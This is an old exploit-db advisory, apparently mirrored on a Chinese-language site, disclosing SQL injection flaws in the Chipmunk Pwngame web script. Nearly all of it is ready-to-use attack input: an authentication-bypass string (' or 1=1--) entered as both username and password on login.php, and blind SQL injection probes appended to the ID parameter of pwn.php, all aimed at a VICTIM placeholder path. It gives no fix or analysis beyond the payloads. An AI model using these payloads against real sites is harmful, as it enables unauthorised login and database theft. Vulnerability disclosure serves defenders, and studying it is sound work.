Chipmunk Pwngame – Multiple SQL Injections

  • 作者: KnocKout
    日期: 2010-10-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15223/
  • ===================================================
Chipmunk Pwngame <= Multiple SQL() Vulnerabilities
===================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
 { H4X0RE SECURITY PROJECT }
AQ. "Rüyalarýma bitek Uyuyoken kavuþuyosam Anladýmki Ölmekte zor deðil.."
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Chipmunk Pwngame
~Software: http://www.chipmunk-scripts.com/page.php?ID=34
~Vulnerability Style : SQL Vulnerabilities
-----------
~Demo:http://www.chipmunk-scripts.com/pwngame/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
~~~~~~~~ Explotation| Auth bypass() ~~~~~~~~~~~
http://VICTIM/Path/login.php
 Username : ' or 1=1-- -H4x0reSEC
 Password : ' or 1=1-- -H4x0reSEC
================================
~~~~~~~~ Explotation| Blind SQL Inj()~~~~~~~~~~~
 http://VICTIM/Path/pwn.php?ID=1 [Blind]
 http://VICTIM/Path/pwn.php?ID=1 and 1=0
 http://VICTIM/Path/pwn.php?ID=1 and 1=1
================================